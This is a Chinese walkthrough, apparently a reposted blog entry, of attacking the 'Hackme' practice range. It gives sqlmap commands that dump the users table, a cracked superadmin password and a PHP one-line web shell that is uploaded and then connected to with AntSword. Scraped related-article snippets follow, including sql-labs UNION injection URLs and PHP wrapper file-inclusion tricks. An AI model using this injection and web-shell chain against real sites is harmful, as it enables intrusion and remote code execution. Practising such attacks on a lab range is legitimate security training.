Hackme靶场渗透攻略

步骤一,注册登录进去

步骤二,点击search

我们发现有很多书

步骤三,搜索一本书抓包发放到重放器

步骤四,数据改为1*,复制数据包到1.txt,然后打开sqlmap

步骤五,sqlmap查看当前数据库

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt --current-db

步骤六,查表

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt -D webapphacking --tables

步骤七,查看users表的数据

python sqlmap.py -r C:\Users\Administrator\Desktop\1.txt -D webapphacking -T users --dump

步骤八,使用管理员账号登录

可以看到密码是被MD5加密的  

在线MD5网站进行解密 可以看到密码是Uncrackable

账号superadmin  密码为Uncrackable  登录成功

步骤九,上传一句话木马

<?php @eval($_POST['cmd']); ?>

shell.php上传成功

我们看可以看到上传的shell.php文件

步骤十,使用蚁剑连接

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1522503.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

多模态AI:原理、应用与未来展望

随着人工智能技术的飞速发展&#xff0c;多模态AI逐渐成为构建智能系统的重要方向。传统的AI系统通常依赖于单一模态的数据&#xff0c;如文本、图像或音频。而多模态AI通过结合多种数据类型&#xff0c;能够在更复杂的场景下提供更智能的解决方案。本文将深入探讨多模态AI的原…

Android 11 (R)AMS Activity内部机制

一、AMS是如何被管理的 如我们在Android 11(R)启动流程中介绍的一样&#xff0c;AMS和ATMS是在SystemServer中被启动的 ActivityTaskManagerService atm mSystemServiceManager.startService(ActivityTaskManagerService.Lifecycle.class).getService(); mActivityManagerSe…

使用vscode debug cpp/python混合编程的程序(从python调用的C++编译的dll)

使用vscode debug cpp/python混合编程的程序&#xff08;从python调用的C编译的dll&#xff09; 1. 安装插件 Python C Debugger https://marketplace.visualstudio.com/items?itemNamebenjamin-simmonds.pythoncpp-debug 2. 在.vscode/launch.json中增加配置 拷贝自 https:…

默默的学python——两个重要的函数dir()、help()

一、dir()函数 dir()函数在Python中用于返回一个对象的所有属性和方法的列表&#xff0c;当你对一个函数使用dir()时&#xff0c;它会返回函数对象的所有可访问的属性和方法的名字列表。 具体的说&#xff0c;dir()函数获取的内容包括&#xff1a; 1.特殊方法和魔法方法 如…

Kettle 锁表原因及解决办法【源码级分析】

文章目录 背景源码分析锁表场景1:资源库锁表锁表场景2:写日志锁表在哪里配置的kettle_log_table?官方解释自增 SQL 获取 BatchI 原理解决自增 SQL 获取 BatchID背景 Kettle 7.1.0 经常出现锁表的情况,体现为在数据库里有一条锁表 SQL,然后整个 Kettle 都无法运行。😂�…

App推广新姿势:Xinstall一键下载唤起,轻松提升用户体验!

在App推广和运营的道路上&#xff0c;你是否遇到过这样的困扰&#xff1a;用户点击下载链接后&#xff0c;却无法直接唤起App&#xff0c;导致用户体验不佳&#xff0c;甚至造成用户流失&#xff1f;别担心&#xff0c;今天我们就来科普一个神器——Xinstall&#xff0c;它能帮…

【GIT】idea中实用的git操作,撤回commit,撤回push、暂存区使用

IDEA中最常见的UI操作&#xff1a;【GIT】Idea中的git命令使用-全网最新详细&#xff08;包括现象含义&#xff09; 文章目录 问题一&#xff1a; idea撤回仅commit错误的代码&#xff08;仅本地仓库&#xff0c;因为还没推送到远程&#xff09;问题二&#xff1a; idea撤回Com…

8个优质视频素材库,商用无忧

如果你正在寻找一些优质的视频素材库&#xff0c;不妨看看以下这些网站。它们提供了各种各样的视频素材&#xff0c;无论是用于家庭视频制作、Vlog、还是社交媒体内容&#xff0c;都能找到合适的素材。从生活日常到创意动画&#xff0c;这些网站都能帮你找到想要的视频素材。一…

学习react day01

&#xff08;1&#xff09;nodejs.cn 中文网 版本须较新 &#xff08;2&#xff09;全局安装 npm install create-react-app -g &#xff08; 版本查询 create-react-app -V&#xff09; &#xff08;3&#xff09;创建app create-react-app test-app &#xff08;4&…

5 - ZYNQ GPIO

文章目录 1 GPIO基本概念1.1 MIO-EMIO简介1.2 MIO-EMIO连接1.3 MIO-EMIO路由1.4 MIO-EMIO配置 2 GPIO控制寄存器2.1 输入/输出控制寄存器2.2 中断控制寄存器2.3 中断触发设置 3 GPIO在Vivado SDK中的使用 1 GPIO基本概念 在ZYNQ中&#xff0c;GPIO&#xff08;General Purpose…

读取obj文件中的vt并转成需要的uv数据

先展示效果图 适用场景&#xff1a;加载的obj模型需要发生形变&#xff0c;同时还要展示模型的纹理效果&#xff0c;可以使用到面料模拟或者弹性物体的模拟当中 具体实现方案&#xff1a; 1、读取obj文件中的vt的值&#xff0c;存起来 2、读取f值&#xff0c;存v索引和vt索引 3…

宿舍|基于SprinBoot+vue的宿舍管理系统(源码+数据库+文档)

宿舍管理系统 基于SprinBootvue的私人诊所管理系统 一、前言 二、系统设计 三、系统功能设计 系统功能实现 后台模块实现 管理员功能实现 学生功能实现 四、数据库设计 五、核心代码 六、论文参考 七、最新计算机毕设选题推荐 八、源码获取&#xff1a; 博主介绍&…

文件包含PHP伪协议利用方法

1.file://协议 使⽤&#xff1a; file:// ⽂件的绝对路径和⽂件名 2.php?cmdfile://D:\phpstudy_pro\WWW\123.txt 2.php://filter协议 ⽤途&#xff1a;常⽤于读取⽂件 / 源码 2.php?cmdphp://filter/readconvert.base64-encode/resource1.php 3.php://input协议 步骤一&…

软考报名临近尾声,接下来干什么?附最新软考报名进度表

软考2023年下半年的报名虽然仅仅过半&#xff0c;但是除了北京之外&#xff0c;其他地区均已经可以报名&#xff0c;而且为数不少的地区已经结束了报名&#xff0c;我相信绝大多数地区的考生应该已经完成了报名&#xff0c;所以从这个意义上讲&#xff0c;软考的报名的确是临近…

sql-labs41-45关通关攻略

第41关 一.查询数据库 http://127.0.0.1/Less-41/?id-1%20union%20select%201,2,database()--http://127.0.0.1/Less-41/?id-1%20union%20select%201,2,database()-- 二.查表 http://127.0.0.1/Less-41/?id-1%20union%20select%201,2,(select%20group_concat(table_name)…

HTB-sequal(mysql)

前言 各位师傅大家好&#xff0c;我是qmx_07&#xff0c;今天给大家讲解sequal这台靶机 渗透过程 信息搜集 服务器开放了3306mysql端口思路&#xff1a;mysql爆破-sC参数会执行 相关的默认脚本 连接mysql数据库 通过空密码连接道mysql数据库flag&#xff1a;7b4bec00d1a39…

本地缓存和分布式缓存有何区别?

缓存是提高服务性能的一把利剑&#xff0c;尤其在高并发、高请求量的服务中性能提升明显。如果后端服务只靠关系型数据库提供支撑&#xff0c;系统会很快达到处理瓶颈。缓存设计无处不在&#xff0c;通常来说可以分为本地缓存与分布式缓存。本地缓存框架主要有Guava cache、Caf…

Java基础——自学习使用(反射)

一、反射的定义 反射是java基础的核心&#xff0c;反射是获取类信息的能力。类信息包括&#xff1a;方法、变量、接口、父类、构造器、类名等。 Java的反射&#xff08;Reflection&#xff09;是一种强大的机制&#xff0c;它允许程序在运行时检查或修改类、接口、字段以及方法…

【书生大模型实战营】MindSearch CPU-only 版部署

MindSearch CPU-only 版部署 MindSearch CPU-only 版部署任务步骤 MindSearch CPU-only 版部署 任务 将 MindSearch 部署到 HuggingFace 并美化 Gradio 的界面&#xff0c;并提供截图和 Hugging Face 的Space的链接。 步骤 按照官方教程&#xff0c;实现在网页上打开MindSe…

Java中等题-盛最多水的容器(力扣)

给定一个长度为 n 的整数数组 height 。有 n 条垂线&#xff0c;第 i 条线的两个端点是 (i, 0) 和 (i, height[i]) 。 找出其中的两条线&#xff0c;使得它们与 x 轴共同构成的容器可以容纳最多的水。 返回容器可以储存的最大水量。 说明&#xff1a;你不能倾斜容器。 我一开…